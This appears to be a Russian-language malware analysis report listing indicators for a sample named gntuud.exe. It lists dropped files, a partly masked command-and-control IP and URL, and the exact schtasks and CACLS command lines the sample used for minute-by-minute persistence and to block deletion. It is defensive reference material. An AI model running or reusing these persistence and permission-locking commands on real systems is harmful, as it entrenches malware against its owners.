Техническая информация
- <SYSTEM32>\tasks\gntuud.exe
- %TEMP%\acc0b83959\gntuud.exe
- %TEMP%\960123792202
- %TEMP%\960123792202
- '85.##9.135.11':80
- http://85.##9.135.11/gjend7w/index.php
- http://85.##9.135.11/gjend7w/index.php?sc###
- '%TEMP%\acc0b83959\gntuud.exe'
- '%TEMP%\acc0b83959\gntuud.exe' ' (со скрытым окном)
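- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "%TEMP%\acc0b83959\gntuud.exe" /F' (со скрытым окном) — закрепление в системе: задание планировщика с именем gntuud.exe запускает файл из %TEMP% каждую минуту; ключ /F перезаписывает уже существующее задание с тем же именем.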
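- '%WINDIR%\syswow64\cmd.exe' /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\acc0b83959" /P "user:N"&&CACLS "..\acc0b83959" /P "user:R" /E&&Exit' (со скрытым окном) — для учётной записи user права на файл gntuud.exe и каталог acc0b83959 сначала сбрасываются (N), затем выдаётся только чтение (R), что затрудняет изменение или удаление файла от имени этого пользователя; «echo Y» автоматически подтверждает запрос CACLS.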
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "%TEMP%\acc0b83959\gntuud.exe" /F
- '%WINDIR%\syswow64\cmd.exe' /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\acc0b83959" /P "user:N"&&CACLS "..\acc0b83959" /P "user:R" /E&&Exit
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo Y"
- '%WINDIR%\syswow64\cacls.exe' "gntuud.exe" /P "user:N"
- '%WINDIR%\syswow64\cacls.exe' "gntuud.exe" /P "user:R" /E
- '%WINDIR%\syswow64\cacls.exe' "..\acc0b83959" /P "user:N"
- '%WINDIR%\syswow64\cacls.exe' "..\acc0b83959" /P "user:R" /E
- '<SYSTEM32>\taskeng.exe' {0CBF91DF-52E2-4A59-9BB9-E691609C1DE5} S-1-5-21-1960123792-2022915161-3775307078-1001:aaeihaena\user:Interactive:[1]